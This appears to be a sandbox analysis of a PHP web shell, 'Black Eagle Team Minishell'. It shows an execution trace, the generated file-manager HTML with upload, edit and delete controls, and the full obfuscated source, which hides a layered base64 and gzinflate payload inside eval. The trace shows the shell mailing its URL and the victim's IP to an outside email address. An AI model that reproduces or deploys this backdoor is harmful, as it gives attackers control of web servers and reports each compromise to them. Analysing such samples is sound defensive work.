4	52	0	0.003928	474856	round	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	2	0.0556640625	3
4	52	1	0.003942	474928
4	52	R			0.056
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	$size = 0.056
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	138	$size = '0.056 KB'
4	53	0	0.004041	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	141	1	'/var/www/html/uploads/prepend.php'
4	53	1	0.004060	475000
4	53	R			FALSE
4	54	0	0.004073	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	143	1	'/var/www/html/uploads/prepend.php'
4	54	1	0.004090	475000
4	54	R			TRUE
4	55	0	0.004102	474960	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	145	1	'/var/www/html/uploads/prepend.php'
5	56	0	0.004116	474960	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/prepend.php'
5	56	1	0.004131	475000
5	56	R			33261
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 33261
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	161	$info = '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= 'x'
4	55	1	0.004265	475000
4	55	R			'-rwxr-xr-x'
4	57	0	0.004280	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/prepend.php'
4	57	1	0.004297	475000
4	57	R			FALSE
4	58	0	0.004310	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/prepend.php'
4	58	1	0.004327	475000
4	58	R			TRUE
4	59	0	0.004340	474960	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	1	'/var/www/html/uploads/prepend.php'
4	59	1	0.004354	475000
4	59	R			1676258413
4	60	0	0.004367	474896	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	2	'd-M-Y H:i'	1676258413
4	60	1	0.004401	475224
4	60	R			'12-Feb-2023 22:20'
4	61	0	0.004416	474960	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/userzero.phtml'
4	61	1	0.004434	475000
4	61	R			TRUE
4	62	0	0.004446	474960	filesize	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	1	'/var/www/html/uploads/userzero.phtml'
4	62	1	0.004461	475000
4	62	R			4451
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	$size = 4.3466796875
4	63	0	0.004486	474856	round	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	2	4.3466796875	3
4	63	1	0.004501	474928
4	63	R			4.347
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	$size = 4.347
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	138	$size = '4.347 KB'
4	64	0	0.004539	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	141	1	'/var/www/html/uploads/userzero.phtml'
4	64	1	0.004555	475000
4	64	R			FALSE
4	65	0	0.004570	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	143	1	'/var/www/html/uploads/userzero.phtml'
4	65	1	0.004586	475000
4	65	R			TRUE
4	66	0	0.004599	474960	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	145	1	'/var/www/html/uploads/userzero.phtml'
5	67	0	0.004613	474960	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/userzero.phtml'
5	67	1	0.004627	475000
5	67	R			33204
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 33204
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	161	$info = '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= '-'
4	66	1	0.004755	475000
4	66	R			'-rw-rw-r--'
4	68	0	0.004769	474960	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/userzero.phtml'
4	68	1	0.004790	475000
4	68	R			FALSE
4	69	0	0.004804	474960	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/userzero.phtml'
4	69	1	0.004820	475000
4	69	R			TRUE
4	70	0	0.004833	474960	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	1	'/var/www/html/uploads/userzero.phtml'
4	70	1	0.004847	475000
4	70	R			1676258413
4	71	0	0.004859	474896	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	2	'd-M-Y H:i'	1676258413
4	71	1	0.004892	475224
4	71	R			'12-Feb-2023 22:20'
4	72	0	0.004920	475008	ini_set	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	188	2	'output_buffering'	0
4	72	1	0.004937	475080
4	72	R			FALSE
4	73	0	0.004950	475008	ini_set	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	189	2	'display_errors'	0
4	73	1	0.004966	475080
4	73	R			''
4	74	0	0.004980	475008	set_time_limit	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	190	1	0
4	74	1	0.004996	475040
4	74	R			FALSE
4	75	0	0.005009	475008	ini_set	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	191	2	'memory_limit'	'64M'
4	75	1	0.005027	475112
4	75	R			'128M'
4	76	0	0.005040	475008	header	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	192	1	'Content-Type: text/html; charset=UTF-8'
4	76	1	0.005059	475040
4	76	R			NULL
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	193	$to = 'alfredofernandezbutar@gmail.com'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	194	$f31337 = 'http://localhost/uploads/userzero.phtml'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	195	$fie = 'Akses http://localhost/uploads/userzero.phtml :p *IP Address : [ 127.0.0.1 ]'
4	77	0	0.005120	475224	mail	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	196	4	'alfredofernandezbutar@gmail.com'	'Papa Yui Chan Dapet Shell Nih : )'	'Akses http://localhost/uploads/userzero.phtml :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
4	77	1	0.006375	475368
4	77	R			FALSE
3	15	1	0.006418	475184
2	7	1	0.006436	429040
			0.006492	344944
TRACE END   [2023-02-13 01:20:39.730303]


Generated HTML code

<html><head>
<meta name="robots" content"noindex.="" nofollow"="">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>Black Eagle Team Minishell</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body><div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>Black Eagle Team Minishell</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><div class="table-div"></div><input id="image" type="hidden"><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 22:20</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">&nbsp;<input type="submit" value=">>"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/userzero.phtml&amp;path=/var/www/html">userzero.phtml</a></td><td><center>4.347 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 22:20</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="userzero.phtml"><input type="hidden" name="path" value="/var/www/html/userzero.phtml">&nbsp;<input type="submit" value=">>"></form></center></td></tr></tbody></table></div><br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br></body></html>

Original PHP code

<?php
/*
            By: MR.P4UL / Bo0G3yM4n
            IG: @blackeagleteam.id
            Mau Ngapain Cukk Mau Recode Yah!
            Eitss Tidak Bisa
*/
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
$arif = "=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";
eval(htmlspecialchars_decode(urldecode(base64_decode($p3mu14))));
exit;
?>